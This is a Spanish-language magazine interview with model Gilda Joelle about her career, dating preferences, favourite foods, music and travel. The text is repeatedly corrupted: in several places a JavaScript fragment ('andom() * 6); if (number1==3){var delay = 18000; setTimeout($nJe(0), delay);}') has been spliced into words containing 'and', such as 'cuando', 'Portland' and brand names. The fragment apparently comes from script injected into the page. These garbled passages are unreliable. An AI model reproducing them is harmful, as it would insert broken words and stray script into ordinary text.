Gilda Joelle la modelo de Alabama

    Gilda Joelle la modelo de Alabama

    Conoce su placer culposo, comida favorita y cómo conquistarla.

    Autor: Redacción Maxim 8 enero, 2020


    FOTO: Instagram @gildajoelle

     

    Conoce a Gilda Joelle nativa de un pequeño pueblo de Alabama.

     

    En tres cortos años, pasó de asistir a su primer casting en Miami a posar para una serie de marcas de belleza y moda, incluidas Lily Pulitzer, Oribe, Bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andier y Fruit of the Loom. Con una maestría en terapia ocupacional de la Universidad de Alabama en Birmingham, la combinación soñadora de belleza y cerebro de Joelle, sin duda, la ayudará a seguir creciendo en una carrera de modelaje ya establecida.

     

    ¿Cómo puede alguien llamar tu atención?

    Alguien puede llamar mi atención al tener confianza, hacerme reír y poder mantener una buena conversación. ¡Hacer preguntas y estar interesado en lo que hago es importante para mí!

     

    ¿Cuál es la peor línea de ligue que has escuchado?

    No puedo pensar en una línea de ligue específica, pero definitivamente he tenido una buena cantidad de DM interesantes.

     

     

    ¿Cómo le haces saber a alguien que estás interesado?

    Si estoy interesado en alguien, ellos lo sabrán.

     

    Cuéntanos sobre la cita de tus sueños.

    Cena en un restaurante altamente calificado con mucho vino tinto, seguido de un cambio de ropa cómoda, viendo la televisión.

     

     

    ¿Qué te excita más?

    ¡Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando mi hombre me hace sentir que soy la única chica en la habitación!

     

    ¿Cuándo te sientes más sexy?

    No importa lo que llevo puesto. Me siento absolutamente mejor cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando mi dieta y mi rutina de ejercicios están en su punto … ¡y un buen bronceado nunca está de más!

     

     

    ¿Quién es tu mayor enamorado de celebridades?

    Mi mayor enamorado de las celebridades es definitivamente Chace Crawford, especialmente cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando protagonizó Gossip Girl.

     

    ¿Qué hay en tu lista de reproducción de música favorita?

    «September» de Earth, Wind, andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Fire sería el número 1. Me encanta la música latina … J Balvin y Bad Bunny son dos de mis favoritos. Cualquier música que pueda bailar estará en mi lista de reproducción.

     

     

    ¿Tienes un atleta o equipo deportivo favorito?

    Mi alma mater, Auburn. ¡War Eagle!

     

    ¿Qué marcas de moda te gusta?

    Me encanta un bolso clásico de Louis Vuitton. Soy una chica atlética, así que me encantan las marcas que lleva Bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andier. Free People, Lovers + Friends y Zimmermann son algunas de mis marcas favoritas.

    ¿Cuál es tu comida favorita?

    Si pudiera tener una comida que incluyera todos mis platos favoritos de diferentes restaurantes, ¡sería un sueño! Comenzaría con la tostada de tártaro de atún de Cru en Nantucket, seguida por el bacalao negro marinado en miso de Nobu en Malibú y la lasaña de Don Angie en Nueva York. Para el postre, me gustaría panna cotta de Estela en Nueva York y el pastel de coco de Chez FonFon en Birmingham. Para beber, tomaría Mi Novia Fea de The Broken Shaker en Miami. Desafortunadamente, esa bebida ya no está en su menú, así que tendré que soñar con eso.

     

    View this post on Instagram

    💘 @kyledeleu #UOonYou

    A post shared by Gilda Joelle Osborn (@gildajoelle) on

     

    ¿Destino de viaje favorito?

    ¡Es difícil elegir solo uno! Amo a San Juan en las Islas Vírgenes de EE. UU. Tienen las playas más hermosas, y me encanta ir a un destino súper informal. Siempre me ha encantado París. Es la ciudad más mágica y romántica que he visitado. Portlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and, Oregon también está en la parte superior de mi lista. Soy un fanático de un pueblo entusiasta, y el ambiente allí es muy relajado.

     

    ¿Cuál es tu placer culposo?

    Mi placer más culpable es comer mis comidas favoritas en la cama. Tengo un gran gusto por lo dulce, ¡así que comer postre en pijama es un gran sí!

     

    View this post on Instagram

    sleepyhead 💤

    A post shared by Gilda Joelle Osborn (@gildajoelle) on

     

     

     

    Temas relacionados con esta nota: , , ,

Conoce su placer culposo, comida favorita y cómo conquistarla.